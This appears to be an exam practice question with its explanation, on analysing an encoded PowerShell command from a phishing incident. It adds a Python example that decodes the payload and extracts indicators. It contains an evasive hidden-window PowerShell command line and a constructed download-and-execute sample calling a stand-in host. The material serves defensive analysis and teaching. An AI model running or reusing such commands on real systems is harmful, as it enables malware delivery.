An analyst is investigating a phishing incident and has retrieved the following as part of the investigation:
cmd.exe /c c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -EncodedCommand
Which of the following should the analyst use to gather more information about the purpose of this command?
The correct answer is A. Echo the command payload content into ‘base64 -d’.
The -EncodedCommand parameter tells PowerShell that the script it is about to run is supplied as a base64 string rather than as plain text, so the real purpose of the command is hidden until that string is decoded. The other switches reinforce the picture: -WindowStyle Hidden keeps the console off the screen, -ExecutionPolicy Bypass disables the script execution policy, and -NoProfile avoids any logging or tooling loaded by the user's profile. Those are common evasion settings, but they say nothing about what the script does; only the decoded payload does.
Echoing the encoded content into base64 -d is a static, non-executing step that turns the blob back into readable PowerShell, so the analyst can see what is actually being run. One caveat a practitioner should know: PowerShell base64-encodes the UTF-16LE bytes of the script, not UTF-8, so the raw output of base64 -d contains a NUL byte after every ASCII character and looks like "I.E.X. ." on the terminal. Piping the result through iconv -f UTF-16LE -t UTF-8 (or decoding the bytes as UTF-16LE in a script) yields the clean text. Decoding first is necessary because the encoding exists precisely to defeat casual inspection and string-based detection, and it reveals the command's intent without giving the malware a chance to run.
Why the others are incorrect:
Execute the command from a Windows VM: Running the command before understanding it is dynamic analysis done blind. Even inside a VM the script may download further stages, beacon to attacker infrastructure, or alter the guest, and a VM that is not fully isolated can leak that traffic. Decode the payload first, in a safe manner (for example with base64 -d), and only then decide whether detonation in an isolated sandbox is worthwhile.
Use a command console with administrator privileges to execute the code: Executing unknown code with elevated privileges is the worst option in an investigation. Whatever destructive or persistence actions the script contains would run with full rights, making the situation worse rather than clearer. The focus should be on decoding the command, not on executing it blindly.
Run the command as an unprivileged user from the analyst workstation: Lower privileges reduce but do not remove the risk. The script can still reach the network, drop files, and compromise the analyst's own workstation, which is both the investigation platform and a foothold into the security team. It is far safer to decode the payload first before considering any execution anywhere.
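The decode step described above, as an added worked example that is not part of the original page: it builds a constructed -EncodedCommand payload (the script text and the example.invalid URL are made up here; the incident's real payload is not shown on the page), decodes it the way base64 -d plus a UTF-16LE conversion would, and pulls out the strings an analyst wants first. The helper names are my own.

```python
import base64
import re

# Constructed sample of what an attacker might hide behind -EncodedCommand.
# This is illustration only; the page does not show the actual incident payload.
SAMPLE_PLAINTEXT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
)


def encode_powershell_command(script: str) -> str:
    """Produce exactly what PowerShell expects after -EncodedCommand:
    base64 over the UTF-16LE bytes of the script (not UTF-8)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _is_utf16le(raw: bytes) -> bool:
    """Heuristic: ASCII-heavy PowerShell in UTF-16LE has a NUL in (almost) every
    odd byte. Plain `base64 -d` output that matches this still needs a UTF-16LE
    conversion before it is readable."""
    if len(raw) < 2 or len(raw) % 2:
        return False
    high_bytes = raw[1::2]
    return sum(b == 0 for b in high_bytes) * 2 > len(high_bytes)


def looks_like_utf16le(encoded: str) -> bool:
    """Same check, applied directly to the base64 string from the command line."""
    return _is_utf16le(base64.b64decode(encoded))


def decode_powershell_command(encoded: str) -> str:
    """Reverse of encode_powershell_command. Equivalent to
    `echo <blob> | base64 -d | iconv -f UTF-16LE -t UTF-8` on a Linux box,
    with a UTF-8 fallback for tooling that encoded the wrong way."""
    raw = base64.b64decode(encoded)
    if _is_utf16le(raw):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def extract_indicators(script: str) -> dict:
    """Pull out URLs and common download/execute primitives from the decoded
    script so the analyst can pivot to network logs and proxy data."""
    urls = re.findall(r"https?://[^\s'\"()]+", script)
    primitives = re.findall(
        r"(?i)\b(IEX|Invoke-Expression|DownloadString|DownloadFile|"
        r"Invoke-WebRequest|Start-Process)\b",
        script,
    )
    return {"urls": urls, "download_exec": sorted(set(primitives))}


if __name__ == "__main__":
    blob = encode_powershell_command(SAMPLE_PLAINTEXT)
    print("powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand", blob)
    script = decode_powershell_command(blob)
    print("decoded:", script)
    print("indicators:", extract_indicators(script))
```

Running the block prints the constructed command line, the recovered script, and the URL and cmdlets it references; nothing in the decoded text is ever executed, which is the point of choosing this step over the three execution-based options.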